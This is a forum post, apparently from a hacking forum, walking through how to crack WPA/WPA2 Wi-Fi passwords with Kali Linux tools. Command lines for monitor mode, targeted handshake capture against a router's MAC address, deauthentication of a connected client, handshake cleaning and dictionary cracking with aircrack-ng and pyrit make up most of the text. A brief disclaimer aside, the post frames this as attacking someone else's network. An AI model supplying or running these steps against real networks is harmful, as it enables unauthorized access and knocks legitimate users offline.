Hacking Wi-Fi with WPA / WPA2 Protection Kali Linux

P

President

Professional
Messages
1,458
Reaction score
1,300
Points
113
b6da8ca7-7d94-4159-862b-357e4defbd15.png

This article is for informational purposes only and does not call for action!

Good day, today I will tell you about hacking a Wi-Fi network with WPA / WPA2 authentication.
The kali linux distribution kit, which contains a large number of utilities, is perfect for conducting penetration testing of wireless networks.

First, we will check the available network interfaces. This can be done with the command:
Code: 
iwconfig

In this case, you will see a similar picture:
scale_1200

In this case, there are 2 available network interfaces, wlan0mon (about the monitoring mode a little later) and wlan1 (wlan0).

After this step, there are several possible paths:
  • The way is simpler and for the lazy: use the wifite utility
  • Do everything with pens and yourself
In the first case, you only need:
- select the device from which to carry out the attack (network interface)
- select the attacked network
- then the utility will do everything by itself: it will either capture a handshake if you attack a WPA network without WPS, or it will perform an attack using Pixie if WPS is enabled.
- in the case of WPA, Wifite can be launched by specifying the dictionary that it will use to crack the handshake (wifite –dict wordlist.txt).

When we made sure that the Wi-Fi adapter is connected and working, we need to find out the signal of which networks it catches, one of the options, turn on the wireless interface and scan.

To do this, we will use the following commands:

ifconfig wlan1 up
(in this case wlan1 is the name of the network interface)

iwlist wlan1 scanning - scanning using the wlan1 interface
scanning using wlan1 interface and we get something like this:

scale_1200

We are interested in several parameters at once:

Network name, MAC address, channel

Now let's try to capture a handshake, for this we need to put the network interface into monitoring mode and capture a handshake.

To switch to monitoring mode, use the command:

airmon-ng start wlan1
in this case, the interface will change its name to wlan1mon and go into monitoring mode (you can check this using iwconfig), while you may be warned that some processes can interfere with this, do not pay attention, this is normal.

scale_1200

For a more accurate handshake capture, we will use the information we received from the scan:

Airodump-ng wlan0mon –-bssid FC: 8B: 97: 57: 97: A9 –-channel 2 -–write handshake –-wps
wlan0mon - interface name

bssid FC: 8B: 97: 57: 97: A9 - MAC address of the router we are hacking

channel 2 - restriction on the channel for the router we hack

write handshake - this command allows us to write the captured information to files called handshake

wps - will display the availability of WPS at the point in case you missed it.

scale_1200

This is how the process of capturing a handshake looks like.
Considering that the handshake occurs when the client connects to the access point, then we need to either wait until the client connects to the access point (for example, by coming home, to the office, or turning on the laptop / wifi) or help the client reconnect to the access point using deauthentication and capture of the handshake when subsequent connection. An example of deauthentication.

aireplay-ng -0 10 –a FC: 8B: 97: 57: 97: A9 –c 68: 3E: 34: 15: 39: 9E wlan0mon
-0 - means deauthentication

10 - the number of deauthentication

-a FC: 8B: 97: 57: 97: A9 - MAC address of the access point

–C 68: 3E: 34: 15: 39: 9E - client MAC address

wlan0mon - used interface

When you catch a handshake it will be displayed in the upper right corner.

scale_1200

Now that we have caught a handshake, it is advisable to check it, clean it up, remove everything unnecessary and guess the password.

You can check in several ways:

1) using the cowpatty utility
Code: 
cowpatty -r handshake-01.cap -c
-r specifies the file to check

indicates that we need to check the handshake and not hack it

scale_1200

As we can see in the screenshot, in the first file we did not have the correct handshake, but in the second we did.

2) Using Wireshark
for this you need to open the wireshark'om file, this can be done both from the terminal (wireshark handshake-01.cap) or manually. With this, you will see a large number of packages. Let's filter out the handshake packets using a filter:
Code: 
eapol || wlan.fc.type_subtype == 0x04 || wlan.fc.type_subtype == 0x08
and click apply

now we need to leave the broadcast of the access point, and the first 2 handshake packets, removing everything else. At the same time, it is necessary to ensure that the number of the first 2 packages does not differ too much, so that they are from the same handshake.

scale_1200

In this case, you can select the Broadcast and the first 2 packets and save them separately.

3) the easiest way is the WPAclean utility.
Code: 
wpaclean handshake-01.cap wpacleaned.cap
handshake-01.cap - this is the source file from which the handshake will be taken

wpacleaned.cap is the file where the cleaned handshake will be written.

scale_1200

As we can see, the output of the program is somewhat different, this is due to the fact that the first file did not have all the necessary information.

Now that we have the correct cleaned handshake, it remains for us to decipher it.

To get a password from Wi-Fi, we need to find a password, when using which the hashes for 2 of our handshakes will match. To do this, you can use a dictionary or select by symbols. If you do not have a supercomputer, then this option is unlikely to suit you, since the number of options is the number of allowed characters to the power of the number of password characters (~ 130 ^ 8 for an 8-digit password). It makes sense to use character matching if you know a piece of the password that will reduce the number of options, or if the password is limited (for example, there are only numbers, or it matches a mobile phone in your area). Now we will brute-force a password using a dictionary.

We can decrypt the handshake using a CPU or GPU. Usually, if you have a powerful video card, then using the GPU is faster.

We'll use aircrack to decrypt with the CPU.
Code: 
aircrack-ng wpacleaned.cap –w wordlist.txt
wpacleaned is our cleaned and tested handshake

-w wordlist.txt is our dictionary, by which we will guess the password

If the password is in the dictionary, then after a while you will see the corresponding message:

scale_1200

This will contain your password. Or a message that the dictionary has ended, but the password has not been found.

The utility for cracking through the GPU is called pyrit, it has much more capabilities and fine tuning, but about them sometime next time, now we will just try to guess the password for the handshake with our specific dictionary.
Code: 
pyrit –r wpacleaned.cap –i wordlist.txt attack_passthrough
-r wpaclean.cap - handshake file

-I wordlist.txt - dictionary file

scale_1200


Ready)
 
You must log in or register to reply here.

Similar threads

A
AMAZON REFUND MYTH OR FACT? HOW IT WORKS?
Replies
0
Views
678
axvor554
A
B
VioletRAT V 4.7
Replies
0
Views
283
bigdog1
B
BadB
TLS ALPN Mismatch as a Proxy Detection Signal: When h2 doesn't match HTTP/2
Replies
0
Views
388
BadB
BadB
I
🫥 HOW TO BYPASS YOUTUBE ANTI ADBLOCK POPUP ♨️
Replies
0
Views
322
Ifrbs
I
Man
Current WiFi Hacking Techniques
Replies
0
Views
788
Man
Man
Back
Top